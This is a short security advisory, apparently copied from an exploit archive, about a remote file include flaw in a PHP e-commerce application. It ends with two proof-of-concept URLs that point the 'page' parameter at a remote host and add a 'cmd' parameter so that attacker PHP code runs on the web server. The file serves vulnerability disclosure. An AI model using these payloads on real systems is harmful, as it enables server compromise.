8 lines
No EOL
612 B
Text
Executable file
8 lines
No EOL
612 B
Text
Executable file
source: http://www.securityfocus.com/bid/15877/info
|
|
|
|
E-commerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the Web server process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
http://www.example.com/index.php?page=http://www.example.com/?&cmd=
|
|
http://www.example.com/?page=http://www.example.com/?&cmd= |